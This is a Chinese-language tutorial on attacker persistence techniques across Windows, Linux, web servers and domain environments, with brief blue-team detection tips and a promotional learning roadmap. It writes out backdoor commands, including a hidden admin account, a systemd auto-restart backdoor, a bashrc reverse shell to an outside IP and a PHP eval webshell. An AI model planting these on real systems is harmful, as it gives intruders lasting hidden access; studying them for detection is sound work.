☰
网络安全中的持久化是什么?常见持久化技术详解
2026/9/28 20:29:13 网站建设 项目流程

网络安全中的持久化是什么?常见持久化技术详解

摘要:持久化(Persistence),也叫权限维持,是 MITRE ATT&CK 框架的核心战术之一。攻击者拿到目标主机权限后,为了在系统重启、账号退出、会话断开后依然保留访问入口,所使用的一系列技术,就是持久化。本文从原理出发,分 Windows、Linux、Web、域环境,详细讲解红队常用持久化手段,同时给出蓝队对应的检测思路,适合内网渗透、护网、应急响应学习。

法律声明

  1. 本文内容仅作为网络安全技术科普、安全防御研究、授权红蓝演练、应急响应学习用途,旨在帮助安全从业人员理解攻击者的技术原理,学习防御、检测、清除恶意持久化后门的相关知识。
  2. 本文提及的命令、脚本、攻防技术,仅允许在拥有完整书面授权的本地靶场、授权测试环境中使用。依据《中华人民共和国刑法》《中华人民共和国网络安全法》《中华人民共和国数据安全法》《计算机信息系统安全保护条例》,未经资产所有人书面许可,入侵、渗透、植入后门、实施权限维持等操作属于违法犯罪行为。
  3. 任何个人或组织不得将本文内容用于非法网络攻击、未授权探测、破坏计算机信息系统等违法活动。
  4. 本文所展示技术案例,均为攻防原理演示,不代表鼓励实施攻击行为。阅读本文,代表知悉相关法律规定。

一、什么是持久化

在渗透后渗透阶段,攻击者通过漏洞拿到 shell、Meterpreter 会话之后,一旦目标服务器重启、管理员杀掉恶意进程、断开当前连接,现有访问就会失效。持久化,就是把访问入口 “埋进系统”,让恶意代码在重启后自动执行,长期控制目标资产,对应 ATT&CK 战术编号 TA0003 Persistence。

持久化分为两大类:

  1. 文件型持久化:会在磁盘留下恶意文件,容易被杀毒、EDR 查杀;
  2. 无文件 / 内存持久化:尽量不落地 exe,利用系统原生功能执行,隐蔽性更强,护网、APT 场景高频出现。

持久化不是独立攻击,是拿下权限之后的巩固手段,也是蓝队应急排查、溯源清理的重点。

二、Windows 系统常见持久化技术

2.1 注册表 Run 启动项(T1547.001)

最经典、最基础的持久化方式。注册表 Run 键内的程序,用户登录时自动运行。
常用路径:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\Run

HKCU 只对当前用户生效;HKLM 是机器级,所有用户登录都会执行,需要管理员权限。

简单示例:写入注册表,开机自动执行 payload。

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdateHelper" /t REG_SZ /d "C:\Windows\Temp\backdoor.exe" /f

蓝队检测:使用 Autoruns、Sysmon 监控注册表写入事件(EventID 13),排查未知、未签名程序路径,尤其 Temp、Public 目录下的可疑可执行文件。

2.2 计划任务 Scheduled Task(T1053.005)

红队非常喜欢的持久化方式,灵活性极高,可以设置开机触发、登录触发、空闲触发、定时执行,甚至可以修改系统自带任务,伪装成系统维护任务。

创建计划任务示例:

schtasks /create /tn "WindowsTelemetryUpdate" /tr "C:\backdoor.exe" /sc onlogon /ru system

可以设置任务名称模仿微软官方组件,降低管理员警惕;部分高级玩法修改原有系统任务的 XML 配置,不新增任务,隐蔽性更强。

蓝队排查:查看C:\Windows\System32\Tasks目录,审计新创建、修改的任务,关注任务执行程序路径、是否隐藏窗口运行。

2.3 Windows 服务(T1543.003)

Windows 服务开机后台自动启动,可以设置为系统权限。攻击者新建恶意服务,或者修改已有服务的执行路径。

创建恶意服务示例:

sc create MyUpdateService binpath= "C:\backdoor.exe" type= own start= auto sc start MyUpdateService

服务信息保存在注册表内,系统启动时自动加载。缺点:新建服务容易被 EDR 告警,高级红队会修改原有废弃服务。

2.4 WMI 事件订阅(无文件持久化 T1546.003)

WMI 事件订阅是经典无文件持久化,不需要落地 exe。由三部分构成:EventFilter(触发条件)、EventConsumer(执行动作)、FilterToConsumerBinding(绑定关联)。
可以设置当用户登录、进程创建、系统启动时,自动执行命令。
优势:没有新增启动项、没有新建计划任务,传统排查工具很难发现,需要开启 Sysmon 19/20/21 事件 ID 才能捕获。

2.5 影子账户 / 隐藏账号(T1136)

新建本地管理员账号,通过$命名 + 修改 SAM 注册表,实现net user、计算机管理界面看不到账号,仅注册表内存在。

net user hacker$ Admin@123456 /add net localgroup administrators hacker$ /add

普通查询命令看不到 hacker$ 账号,管理员容易忽略。域环境下还可以创建域隐藏账号。

2.6 DLL 劫持、DLL 侧加载

利用 Windows 程序加载 DLL 的搜索顺序。将同名恶意 DLL 放到目标 exe 同目录,当合法程序启动时,优先加载恶意 DLL,实现代码执行,达到持久化。很多正规软件、系统程序都存在此类风险。

2.7 COM 组件劫持

修改注册表 CLSID,劫持 COM 对象。当系统调用该 COM 组件时,加载恶意 payload。特点:普通用户权限即可实现持久化,不需要管理员,在很多红队报告中作为低权限维持手段。

三、Linux 系统常见持久化技术

3.1 Crontab 定时任务(T1053.003)

Linux 最常用持久化。crontab可以定时执行脚本,@reboot代表系统开机自动执行。

# 开机执行payload echo "@reboot /tmp/backdoor.sh" >> /var/spool/cron/root

除用户 crontab 外,/etc/cron.d/目录放独立定时文件,容易被管理员忽略。

3.2 systemd 恶意服务(T1543.002)

现代 CentOS7+、Ubuntu 等发行版默认使用 systemd。攻击者编写.service 单元文件,设置开机自启。

示例 /etc/systemd/system/backdoor.service

[Unit] Description=System Update Helper [Service] ExecStart=/tmp/backdoor Restart=always [Install] WantedBy=multi-user.target
systemctl daemon-reload systemctl enable backdoor systemctl start backdoor

Restart=always 代表进程被杀后会自动重启,实现 “不死后门”。

3.3 ~/.bashrc/ ~/.profile 后门

用户登录 shell 加载 bashrc,攻击者在文件末尾追加恶意命令。只要用户登录 SSH、终端,就自动触发 payload。

echo "bash -i >& /dev/tcp/1.1.1.1/8888 0>&1" >> ~/.bashrc

特点:仅对当前用户生效,不需要 root,拿到普通账号即可埋入后门。

3.4 SUID 提权后门

编译一个设置 SUID 权限的二进制文件,所有者 root,普通用户执行就能拿到 root 权限。就算攻击者会话断开,后续只要登录主机,运行这个文件即可获取高权限。

chmod 4777 /tmp/suid_backdoor

3.5 SSH 公钥持久化

攻击者把自己的公钥写入目标~/.ssh/authorized_keys。后续直接用私钥 SSH 登录,不需要账号密码,是内网横向之后非常稳定的维持方式。很多运维服务器都会中招。

四、Web 服务器持久化(Web 场景)

4.1 Webshell 一句话木马

上传 php/jsp/aspx 脚本到网站目录,攻击者随时访问脚本执行命令。常见的 PHP 一句话:

<?php @eval($_POST['cmd']);?>

蓝队清理难点:攻击者会把 Webshell 藏在图片、缓存目录、二次封装到框架源码中。

4.2 不死马(PHP 内存后门)

经典 Web 持久化。使用ignore_user_abort(true),脚本断开连接后继续后台循环运行,持续重新写入 Webshell。就算管理员删除木马文件,进程会立刻重新生成,只有重启 web 服务才能清除。

4.3 IIS/nginx 恶意模块、中间件后门

在 IIS 添加恶意模块,或者修改 Nginx 动态模块,Web 服务启动自动加载恶意代码,每次访问网站都会触发执行,隐蔽性极高。

五、域环境高级持久化(内网域渗透)

拿到域管权限之后,攻击者会部署域级持久化,一台机器埋入,控制整个域。

  1. 组策略 GPO 持久化:修改域组策略,域内所有主机开机、登录自动执行恶意脚本,文件放在 SYSVOL 共享目录;
  2. DSRM 账号后门:域控 DSRM 目录修复模式账号,修改密码后门,拿到域控本地权限;
  3. Skeleton Key(骨架密钥):注入域控 lsass 进程,给所有域账号增加万能后门密码;

注:骨架密钥属于内存后门,域控重启失效,常搭配其他持久化一起使用。

六、持久化技术选型思路(红队视角)

  1. 低权限:优先 COM 劫持、bashrc、SSH 公钥、注册表 HKCU,不需要管理员;
  2. 单机高权限:计划任务、系统服务、WMI 订阅、影子账号;
  3. Web 服务器:Webshell、不死马;
  4. 域控:GPO、DSRM,实现全域维持;
  5. 隐蔽优先:无文件 WMI、内存注入,尽量不落地 exe,规避 AV/EDR。

核心原则:持久化要多路径埋点,放 2~3 种不同类型后门。就算蓝队清除一种,还有其他入口,这也是护网演练中经常遇到的情况。

七、蓝队检测与清除思路

  1. 基础排查:Autoruns、检查注册表 Run 项、开机启动文件夹、系统服务、计划任务;
  2. 日志审计:Sysmon 监控注册表、进程创建、WMI 事件;Linux 审计 crontab、systemd 单元文件、bashrc;
  3. Web 排查:全盘检索 Web 目录内 eval、assert 等恶意函数,查找隐藏 webshell;
  4. 账号审计:遍历本地和域账号,检查隐藏影子账号、SSH authorized_keys;
  5. 清理要点:只删恶意文件不够,必须删除持久化触发入口,否则重启后门自动恢复;内存后门需要重启主机或杀死对应进程。

八、总结

持久化是后渗透阶段的核心能力,本质是利用操作系统、中间件、域机制的自动执行能力,预埋攻击入口。
新手很容易只关注漏洞利用,忽略持久化。护网、红蓝对抗中,红队拿下权限第一件事就是埋持久化;而蓝队应急响应,最关键的就是全面排查所有持久化点位,彻底清除后门,避免攻击者再次回连。

想要学好持久化,需要吃透 Windows/Linux 开机启动流程,熟悉 MITRE ATT&CK TA0003,在授权靶场反复复现,理解每种技术的触发时机、痕迹、检测方法。

免责声明

  1. 本文所提供全部技术内容,仅用于网络安全防御学习、授权安全测试、安全应急研究,作者不对任何个人或组织利用本文内容产生的行为承担任何法律责任。
  2. 读者自行使用文中所有命令、脚本、技术所造成的一切损失、法律后果,全部由读者本人独立承担。
  3. 本文力求内容准确,但不保证文中所有技术、命令不存在疏漏,因操作失误造成的系统损坏、数据丢失,作者不承担任何赔偿责任。
  4. 严禁将本文内容用于任何未授权的网络测试、入侵、破坏活动,一旦发生违法行为,相关责任由实施者自行承担。
  5. 如不同意本免责条款,请立即关闭本文,停止阅读和学习。

最后

网络安全需要学习那些知识

网络安全零基础入门学习路线&规划

初级
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!

7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。

网络安全工程师企业级学习路线

视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

一些我自己买的、其他平台白嫖不到的视频教程:

要学习网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询